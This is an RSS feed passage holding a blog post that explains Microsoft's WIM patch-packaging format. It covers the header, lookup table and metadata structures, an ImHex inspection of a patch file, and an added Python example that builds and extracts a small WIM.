<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>pleasedonthack.me</title>
    <description>A learning resource of topics broken down to the basics.</description>
    <link>https://basicinfosecurity.github.io//</link>
    <atom:link href="https://basicinfosecurity.github.io//feed.xml" rel="self" type="application/rss+xml"/>
    <pubDate>Tue, 02 Jun 2026 02:53:50 +0000</pubDate>
    <lastBuildDate>Tue, 02 Jun 2026 02:53:50 +0000</lastBuildDate>
    <generator>Jekyll v3.10.0</generator>
    
      
      <item>
        <title>(At) the WIM of Microsoft - Uncovering Microsoft&apos;s Patch Secrets</title>
        <description>&lt;h1 id=&quot;following-the-bits&quot;&gt;Following the bits&lt;/h1&gt;
&lt;p&gt;While patch diffing with &lt;a href=&quot;https://gist.github.com/wumb0/306f97dc8376c6f53b9f9865f60b4fb5&quot;&gt;PatchExtract.ps1&lt;/a&gt;, I encountered a peculiar change in Microsoft’s recent patch releases. The updates used to be packaged as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.cab&lt;/code&gt; files but are now shipped as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.wim&lt;/code&gt; files. What is this file format?&lt;/p&gt;

&lt;h1 id=&quot;a-bit-of-history&quot;&gt;A bit of History&lt;/h1&gt;
&lt;p&gt;Thankfully the format is documented. We will refer heavily to Microsoft’s official &lt;a href=&quot;https://www.microsoft.com/en-us/download/details.aspx?id=13096&quot;&gt;whitepaper&lt;/a&gt; to lay out its design elements; it describes the format as follows:&lt;/p&gt;

&lt;dl&gt;
  &lt;dt&gt;Windows Imaging Format (WIM)&lt;/dt&gt;
  &lt;dd&gt;a file-based disk image format introduced in Windows Vista. WIM files are compressed packages containing a number of related files. The format of a WIM file is optimized for maximum compression using LZX, fast compression using XPRESS, or uncompressed.&lt;sup id=&quot;fnref:1&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:1&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;1&lt;/a&gt;&lt;/sup&gt;&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;To simplify, a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.wim&lt;/code&gt; is a file which is mounted to view, like you would a disk, to access the files. Think of it like inserting a CD into an optical drive to view its file contents.&lt;/p&gt;

&lt;p&gt;The format dates back to Vista and came into use for distributing patches sometime in 2024&lt;sup id=&quot;fnref:2&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:2&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;2&lt;/a&gt;&lt;/sup&gt; &lt;sup id=&quot;fnref:3&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:3&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;3&lt;/a&gt;&lt;/sup&gt;. The change is not problematic in itself, since Microsoft is not trying to keep patches out of reach of prying eyes (&lt;em&gt;it did prompt the interest behind this research&lt;/em&gt;). Every modern Windows system ships tools that handle the format: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ImageX&lt;/code&gt; (deprecated), &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dism&lt;/code&gt; (which replaced &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ImageX&lt;/code&gt;) and the &lt;a href=&quot;https://learn.microsoft.com/en-us/powershell/module/dism/?view=windowsserver2025-ps&quot;&gt;DISM Powershell Module&lt;/a&gt; (built on top of DISM). These tools require &lt;a href=&quot;https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/take-inventory-of-an-image-or-component-using-dism?view=windows-11#list-images-that-are-contained-in-a-wim-or-vhd-file&quot;&gt;Admin privileges&lt;/a&gt;, however, as they mount the file as if it were a disk, hence the &lt;em&gt;“file-based disk image format”&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;There are also third-party tools that recognize and unpack the format, the better known being &lt;a href=&quot;https://github.com/ip7z/7zip/tree/main/CPP/7zip/Archive/Wim&quot;&gt;7zip&lt;/a&gt; and &lt;a href=&quot;https://peazip.github.io/wim-utility.html&quot;&gt;PeaZip&lt;/a&gt;. Scripts such as &lt;a href=&quot;https://www.elevenforum.com/t/a-script-to-extract-wim-and-psf-from-msu-windows-update-files.39262/&quot;&gt;this one&lt;/a&gt; shared on ElevenForum by &lt;a href=&quot;https://github.com/jen1-sys&quot;&gt;Jen Wolf / jen1-sys&lt;/a&gt; and &lt;a href=&quot;https://github.com/m417z/winbindex/blob/main/data/upd02_get_manifests_from_updates.py#L170&quot;&gt;this one&lt;/a&gt; from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;winbindex&lt;/code&gt; both drive 7zip. Of the two archivers, 7zip unpacks faster. There is also &lt;a href=&quot;https://wimlib.net/&quot;&gt;wimlib&lt;/a&gt;, which provides a suite of tools for working with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.wim&lt;/code&gt; files.&lt;/p&gt;

&lt;h1 id=&quot;a-closer-look&quot;&gt;A Closer Look&lt;/h1&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/wim_structure.gif&quot; alt=&quot;wim file structure&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The WIM File Structure is similar to other formats wherein a header is at the start of the file, followed by the Resource Files and the Metadata Resource, then the Lookup Table. The Resource Files are the actual files we want (e.g. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.cab&lt;/code&gt; files) and the Lookup Table will tell us where to find them in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.wim&lt;/code&gt; file.&lt;/p&gt;

&lt;h2 id=&quot;wim-header&quot;&gt;WIM Header&lt;/h2&gt;
&lt;p&gt;The header tells us whether the resources in the file are compressed, where the Lookup Table is (which in turn locates the resources) and where the Metadata resource is. Let’s take a look:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;typedef struct _WIMHEADER_V1_PACKED
{
    CHAR ImageTag[8];                 // &quot;MSWIM\0\0&quot;
    DWORD cbSize;                     // Header size, always
                                      // 208 bytes
    DWORD dwVersion;                  // Always 68864
    DWORD dwFlags;                    // Describes resources
    DWORD dwCompressionSize;          // Size of wim if compressed
    GUID gWIMGuid;
    USHORT usPartNumber;
    USHORT usTotalParts;
    DWORD dwImageCount;
    RESHDR_DISK_SHORT rhOffsetTable;  // Lookup Table
    RESHDR_DISK_SHORT rhXmlData;
    RESHDR_DISK_SHORT rhBootMetadata; // Metadata resource
    DWORD dwBootIndex;
    RESHDR_DISK_SHORT rhIntegrity;
    BYTE bUnused[60];
} WIMHEADER_V1_PACKED, *LPWIMHEADER_V1_PACKED;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We are mainly interested in whether &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dwFlags&lt;/code&gt; has any of the following bits set (as an aside, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dwCompressionSize&lt;/code&gt;, despite the whitepaper’s comment, holds the compression chunk size, 32768 bytes by default, rather than the size of the WIM):&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;FLAG_HEADER_COMPRESSION                 0x00000002
FLAG_HEADER_COMPRESS_XPRESS             0x00020000
FLAG_HEADER_COMPRESS_LZX                0x00040000
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;If &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FLAG_HEADER_COMPRESSION&lt;/code&gt; is set in the header, either &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FLAG_HEADER_COMPRESS_XPRESS&lt;/code&gt; or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FLAG_HEADER_COMPRESS_LZX&lt;/code&gt; will be set alongside it, and that is what tells us which compression method the file uses: every compressed resource in a WIM uses the one algorithm named in the header. As we will go over later, each resource also has its own flag to say whether it was stored compressed at all. &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-xca/a8b7cb0a-92a6-4187-a23b-5e14273b96f8&quot;&gt;XPRESS&lt;/a&gt; and &lt;a href=&quot;https://en.wikipedia.org/wiki/LZX&quot;&gt;LZX&lt;/a&gt; are the two methods the whitepaper defines; a third, commonly referred to as &lt;a href=&quot;https://wimlib.net/compression.html#LZMS&quot;&gt;LZMS&lt;/a&gt;, was added later for &lt;a href=&quot;https://en.wikipedia.org/wiki/Solid_compression&quot;&gt;solid WIMs&lt;/a&gt; (wimlib assigns it the header flag &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x00080000&lt;/code&gt;).&lt;/p&gt;

&lt;h2 id=&quot;lookup-table&quot;&gt;Lookup Table&lt;/h2&gt;
&lt;p&gt;As the header shows, the Lookup Table and the Metadata resource are both described by a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RESHDR_DISK_SHORT&lt;/code&gt;:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;typedef struct _RESHDR_DISK_SHORT
{
    RESHDR_BASE_DISK Base;
    LARGE_INTEGER liOriginalSize;    // Uncompressed size
                                     // of the resource
}

typedef struct _RESHDR_BASE_DISK
{
    union
    {
        ULONGLONG ullSize;
        struct
        {
            BYTE sizebytes[7];       // Compressed size
                                     // of the resource
            BYTE bFlags;
        };
    };
    LARGE_INTEGER liOffset;
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RESHDR_DISK_SHORT&lt;/code&gt; wraps another struct, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RESHDR_BASE_DISK&lt;/code&gt;, which packs the compressed size into seven bytes (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sizebytes&lt;/code&gt;), uses the eighth byte for the flags (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bFlags&lt;/code&gt;) and then gives the resource’s location in the file (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liOffset&lt;/code&gt;); &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liOriginalSize&lt;/code&gt; adds the uncompressed size. In the header, this is how the Lookup Table and the Metadata resource are located. Each record in the Lookup Table extends the same structure with the part number, a reference count and the SHA1 hash of the resource, so a record gives us the resource’s offset, its hash and its compression flag:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;typedef struct _RESHDR_DISK
{
    RESHDR_DISK_SHORT;
    USHORT usPartNumber;
    DWORD dwRefCount;
    BYTE bHash[HASH_SIZE];          // SHA1
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;As mentioned earlier, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dwFlags&lt;/code&gt; tells us whether compression is used in the file at all. Each Resource also carries its own &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bFlags&lt;/code&gt; byte, which identifies whether that particular resource is compressed:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;RESHDR_FLAG_FREE                    0x01
RESHDR_FLAG_METADATA                0x02
RESHDR_FLAG_COMPRESSED              0x04
RESHDR_FLAG_SPANNED                 0x08
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;If &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FLAG_HEADER_COMPRESSION&lt;/code&gt; is unset in the header, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RESHDR_FLAG_COMPRESSED&lt;/code&gt; will be unset on every resource. The reverse does not hold: a compressed WIM can still store an individual resource raw when compressing it would not have made it smaller, so the per-resource flag is the one to check before attempting to decompress anything.&lt;/p&gt;

&lt;h2 id=&quot;metadata-resource&quot;&gt;Metadata Resource&lt;/h2&gt;

&lt;p&gt;A &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SECURITYBLOCK_DISK&lt;/code&gt; struct sits at the head of the Metadata resource; it holds the image’s security descriptors, which we can ignore beyond skipping over the block. Each directory entry that follows is described as:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;typedef struct _DIRENTRY
{    
    LARGE_INTEGER liLength;                 // Size of this struct
    DWORD dwAttributes;
    DWORD dwSecurityId;
    LARGE_INTEGER liSubdirOffset;
    LARGE_INTEGER liUnused1;
    LARGE_INTEGER liUnused2;
    // File Timestamps
    LARGE_INTEGER liCreationTime;
    LARGE_INTEGER liLastAccessTime;
    LARGE_INTEGER liLastWriteTime;
    BYTE bHash[HASH_SIZE];                  // SHA1
    union
    {
        struct
        {
            DWORD dwReparseTag;
            DWORD dwReparseReserved;
        };
        LARGE_INTEGER liHardLink;
    };
    USHORT wStreams;                        // Alternate
                                            // Data Streams
    USHORT wShortNameLength;
    USHORT wFileNameLength;
    WCHAR FileName[0];
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;For each entry record, we’re mostly interested in:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liLength&lt;/code&gt; - Size of this entry, which varies from entry to entry&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bHash&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wFileNameLength&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FileName&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The struct is variable in size because an entry can carry Alternate Data Streams, a short name and a file name, all at its tail end, but the fixed part is &lt;a href=&quot;https://github.com/ebiggers/wimlib/blob/master/include/wimlib/dentry.h#L17&quot;&gt;0x66 or 102 bytes&lt;/a&gt;. Note that the whitepaper struct as reproduced above adds up to only 98 bytes: on disk there are four extra bytes ahead of the reparse/hard-link union (wimlib names the field &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rp_unknown_1&lt;/code&gt;), which is why &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wFileNameLength&lt;/code&gt; sits at offset 100 and the name starts at 0x66. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wFileNameLength&lt;/code&gt; is a byte count, not a character count, so the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FileName&lt;/code&gt; is read by seeking 0x66 past the start of the entry and reading that many bytes as a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;WCHAR&lt;/code&gt; (UTF-16LE) string. The next entry begins &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liLength&lt;/code&gt; bytes after the current one, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liLength&lt;/code&gt; being rounded up to a multiple of 8, and a directory listing ends with an entry whose &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liLength&lt;/code&gt; is 0. The timestamps are technically unnecessary but handy for dating when the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.cab&lt;/code&gt; files were created and last modified.&lt;/p&gt;

&lt;h1 id=&quot;unpacking-the-wim&quot;&gt;Unpacking the WIM&lt;/h1&gt;
&lt;p&gt;The Lookup Table and the Metadata resource go hand in hand to identify the resources inside the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.wim&lt;/code&gt;. Think of these as the three pieces needed to retrieve, or carve, the files from the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.wim&lt;/code&gt; file:&lt;/p&gt;

&lt;table&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;Resource Files&lt;/td&gt;
      &lt;td&gt;File data&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Lookup Table / rhOffsetTable&lt;/td&gt;
      &lt;td&gt;Contains the offsets and the hash of each resource file&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;Metadata Resource / rhBootMetadata&lt;/td&gt;
      &lt;td&gt;Contains the file names and the hash of each entry&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;The whitepaper describes the file retrieval process as the “Image Apply Process”&lt;sup id=&quot;fnref:4&quot; role=&quot;doc-noteref&quot;&gt;&lt;a href=&quot;#fn:4&quot; class=&quot;footnote&quot; rel=&quot;footnote&quot;&gt;4&lt;/a&gt;&lt;/sup&gt;. While the process is clear enough, we can further simplify it for our purposes:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Get the location of the Lookup Table and the Metadata from the header.&lt;/li&gt;
  &lt;li&gt;Match the SHA1 from the Metadata with the Lookup Table.&lt;/li&gt;
  &lt;li&gt;Write out each file using the name from the Metadata and the offset and size from the Lookup Table.&lt;/li&gt;
&lt;/ol&gt;
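&lt;p&gt;Here is the whole procedure above, from header to carved file, as an added example; it is not part of the original post or of its scripts, and it is Python rather than the post’s PowerShell. To run offline it first builds a constructed, uncompressed, single-image WIM in memory (two made-up &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.cab&lt;/code&gt; stand-ins, an empty security block and an empty &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rhBootMetadata&lt;/code&gt;, mirroring what the patch WIMs look like) and then parses it back: header flags, the Lookup Table records, the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RESHDR_FLAG_METADATA&lt;/code&gt; record, the directory entries and the SHA1 join, verifying every carved file’s hash and refusing resources flagged compressed rather than decompressing them. It goes slightly beyond the post by following &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liSubdirOffset&lt;/code&gt; into subdirectories. Only the field offsets from the structs above are taken from the source; &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;build_wim&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;extract&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tamper_detected&lt;/code&gt; and the sample file names are the example’s own inventions.&lt;/p&gt;

```python
# Added example (not from the post or its scripts): build a tiny uncompressed WIM in
# memory, then carve its files back out via header, Lookup Table and Metadata resource.
import hashlib

HDR_SIZE = 0xD0                 # cbSize, always 208 bytes
FLAG_HEADER_COMPRESSION = 0x02  # dwFlags bit: resources in this WIM are compressed
RESHDR_FLAG_METADATA = 0x02     # bFlags bit: this resource is an image's metadata
RESHDR_FLAG_COMPRESSED = 0x04   # bFlags bit: this resource is stored compressed

def le(buf, off, n):            # little-endian unsigned integer at buf[off:off + n]
    return int.from_bytes(buf[off:off + n], 'little')
def u(n, width):
    return n.to_bytes(width, 'little')
def has_flag(value, flag):      # flag is a single bit
    return (value // flag) % 2 == 1

def reshdr_short(size, offset, flags=0):
    # RESHDR_DISK_SHORT: 7-byte stored size, bFlags byte, liOffset, liOriginalSize
    return u(size, 7) + bytes([flags]) + u(offset, 8) + u(size, 8)

def dentry(name, sha1=bytes(20), attrs=0x20, subdir=0):
    # _DIRENTRY on disk: 102 fixed bytes, then the UTF-16LE name (wFileNameLength is its
    # byte count) and a 2-byte terminator; liLength is rounded up to a multiple of 8
    wname = name.encode('utf-16-le')
    body = u(attrs, 4) + u(0, 4) + u(subdir, 8) + bytes(40) + sha1 + bytes(16)
    body += u(len(wname), 2) + wname + (u(0, 2) if wname else b'')
    length = (8 + len(body) + 7) // 8 * 8
    return u(length, 8) + body + bytes(length - 8 - len(body))

def build_wim(files):
    # header | file resources | metadata resource | Lookup Table; rhBootMetadata and the
    # security block are both left empty, as in the patch WIMs the post examines
    body, blobs = b'', []
    for name, content in files.items():
        blobs.append((name, hashlib.sha1(content).digest(), HDR_SIZE + len(body), len(content)))
        body += content
    sec = u(8, 4) + u(0, 4)                 # SECURITYBLOCK_DISK with dwTotalLength 8, no entries
    root = dentry('', attrs=0x10, subdir=8 + 104 + 8)   # security block + root entry + end marker = 0x78
    meta = sec + root + bytes(8) + b''.join(dentry(n, h) for n, h, _, _ in blobs) + bytes(8)
    meta_off = HDR_SIZE + len(body)
    table = reshdr_short(len(meta), meta_off, RESHDR_FLAG_METADATA) + u(1, 2) + u(1, 4) + hashlib.sha1(meta).digest()
    for _, h, off, size in blobs:           # RESHDR_DISK: short header, part number, ref count, SHA1
        table += reshdr_short(size, off) + u(1, 2) + u(1, 4) + h
    hdr = b'MSWIM\x00\x00\x00' + u(HDR_SIZE, 4) + u(68864, 4) + u(0x80, 4)   # dwFlags: RP_FIX only
    hdr += u(0x8000, 4) + bytes(16) + u(1, 2) + u(1, 2) + u(1, 4)   # chunk size, GUID, parts, images
    hdr += reshdr_short(len(table), meta_off + len(meta))            # rhOffsetTable at +0x30
    hdr += reshdr_short(0, 0) + reshdr_short(0, 0)                   # rhXmlData, rhBootMetadata
    return hdr + bytes(HDR_SIZE - len(hdr)) + body + meta + table

def parse_reshdr(buf, off):
    # (stored size, bFlags, liOffset) of the RESHDR_DISK_SHORT at buf[off]
    return le(buf, off, 7), buf[off + 7], le(buf, off + 8, 8)

def parse_header(buf):
    if buf[:8] != b'MSWIM\x00\x00\x00':
        raise ValueError('bad ImageTag')
    return {'compressed': has_flag(le(buf, 0x10, 4), FLAG_HEADER_COMPRESSION),
            'offset_table': parse_reshdr(buf, 0x30), 'boot_metadata': parse_reshdr(buf, 0x60)}

def lookup_table(buf, hdr):
    # one 50-byte RESHDR_DISK per resource, keyed by SHA1; note the METADATA-flagged one
    size, _, off = hdr['offset_table']
    records, meta = {}, None
    for rec in range(off, off + size, 50):
        rsize, rflags, roff = parse_reshdr(buf, rec)
        records[buf[rec + 30:rec + 50]] = (roff, rsize, rflags)
        if has_flag(rflags, RESHDR_FLAG_METADATA):
            meta = (roff, rsize)
    return records, meta

def walk_dentries(meta, off):
    # yield (name, attrs, sha1) for one listing, descending through liSubdirOffset
    while le(meta, off, 8):                 # an entry with liLength 0 ends the listing
        length, attrs, subdir = le(meta, off, 8), le(meta, off + 8, 4), le(meta, off + 16, 8)
        name_len = le(meta, off + 100, 2)   # bytes, not WCHARs
        yield meta[off + 102:off + 102 + name_len].decode('utf-16-le'), attrs, meta[off + 64:off + 84]
        if subdir:
            yield from walk_dentries(meta, subdir)
        off += length

def extract(buf):
    hdr = parse_header(buf)
    records, meta_loc = lookup_table(buf, hdr)
    msize, _, moff = hdr['boot_metadata']
    if moff == 0:                           # no bootable image: use the METADATA-flagged record
        moff, msize = meta_loc
    meta = buf[moff:moff + msize]
    out = {}
    for name, attrs, sha1 in walk_dentries(meta, (le(meta, 0, 4) + 7) // 8 * 8):
        if has_flag(attrs, 0x10):           # FILE_ATTRIBUTE_DIRECTORY: nothing to carve
            continue
        roff, rsize, rflags = records[sha1] # the hash join with the Lookup Table
        if has_flag(rflags, RESHDR_FLAG_COMPRESSED):
            raise NotImplementedError('compressed resource not handled: ' + name)
        data = buf[roff:roff + rsize]
        if hashlib.sha1(data).digest() != sha1:
            raise ValueError('SHA1 mismatch for ' + name)
        out[name] = data
    return out

def tamper_detected(buf):
    mod = bytearray(buf)
    mod[HDR_SIZE] ^= 0xFF                   # corrupt the first file resource
    try:
        extract(bytes(mod))
    except ValueError:
        return True
    return False

SAMPLE_FILES = {'DesktopDeployment.cab': b'MSCF' + bytes(range(60)),   # constructed stand-ins
                'SSU-26100.3764-x64.cab': b'MSCF' + bytes(60)}
```

&lt;p&gt;Calling &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;extract(build_wim(SAMPLE_FILES))&lt;/code&gt; returns the two files keyed by name; &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tamper_detected&lt;/code&gt; flips one byte of the first resource and shows the SHA1 check catching it, which is the same check the post performs by hand after extraction. The constructed root entry lands the first child entry at 0x78, the same offset the post’s script skips to.&lt;/p&gt;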

&lt;h2 id=&quot;inspecting-with-imhex&quot;&gt;Inspecting with ImHex&lt;/h2&gt;

&lt;p&gt;To understand how these pieces work together, we’ll use a hex editor called &lt;a href=&quot;https://github.com/WerWolv/ImHex&quot;&gt;ImHex&lt;/a&gt;. To aid in our investigation exercise, I wrote a &lt;a href=&quot;https://github.com/basicinfosecurity/misc/blob/master/WIM/wim.hexpat&quot;&gt;pattern file&lt;/a&gt;:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/imhex 1.PNG&quot; alt=&quot;imhex wim pattern&quot; /&gt;&lt;/p&gt;

&lt;p&gt;If you want to follow along, you can download any recent patch from the &lt;a href=&quot;https://catalog.update.microsoft.com/home.aspx&quot;&gt;Microsoft Update Catalog&lt;/a&gt; and import the &lt;a href=&quot;https://github.com/basicinfosecurity/misc/tree/master/WIM/wim.hexpat&quot;&gt;pattern file&lt;/a&gt; into ImHex.&lt;/p&gt;

&lt;p&gt;We’ll try to understand how Microsoft packages the patch. Let’s look at the header first. The flags at offset &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;+0x10&lt;/code&gt; have only one bit set, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FLAG_HEADER_RP_FIX&lt;/code&gt; (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x80&lt;/code&gt;). The meaning of this flag is not important for our purpose. What is important is that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FLAG_HEADER_COMPRESSION&lt;/code&gt; is unset:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/imhex 3v2.png&quot; alt=&quot;header flags&quot; /&gt;&lt;/p&gt;

&lt;p&gt;At &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;+0x30&lt;/code&gt; we find info on the Lookup Table:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/lookup tablev2.png&quot; alt=&quot;lookup table&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The resource is not compressed, as shown by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liOriginalSize&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sizebytes&lt;/code&gt; being equal; the former is the uncompressed size, the latter the compressed size. We also see the Lookup Table is located at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x30a2d304&lt;/code&gt;. Dividing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liOriginalSize&lt;/code&gt; by the size of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RESHDR_DISK&lt;/code&gt; gives the number of records in the Lookup Table, so &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liOriginalSize / sizeof(RESHDR_DISK)&lt;/code&gt;, that is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;liOriginalSize / 50&lt;/code&gt;, amounts to 8 records.&lt;/p&gt;

&lt;p&gt;At &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;+0x60&lt;/code&gt; we expect to find data on the Metadata resource, however:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/metadata 1.PNG&quot; alt=&quot;metadata1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There’s nothing there. Is our patch file faulty? Is the metadata missing?&lt;/p&gt;

&lt;p&gt;If we drill down &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FileResources&lt;/code&gt;, we will find something interesting at the first resource:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/resource1v2.png&quot; alt=&quot;metadata2&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Out of all the resources, the first resource has its &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RESHDR_FLAG_METADATA&lt;/code&gt; set. Why is that?&lt;/p&gt;

&lt;p&gt;It turns out this is where the Metadata resource lives. The header’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rhBootMetadata&lt;/code&gt; only points at the metadata of the bootable image, the one selected by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dwBootIndex&lt;/code&gt;; a patch WIM has no bootable image, so the field is left zeroed, and each image’s metadata is instead found through the Lookup Table record that carries &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RESHDR_FLAG_METADATA&lt;/code&gt;, which is &lt;a href=&quot;https://github.com/ebiggers/wimlib/blob/e59d1de0f439d91065df7c47f647f546728e6a24/src/blob_table.c#L1050&quot;&gt;how wimlib locates it&lt;/a&gt; too. Knowing this, we can parse that record as Metadata by laying this pattern on top of it:&lt;/p&gt;

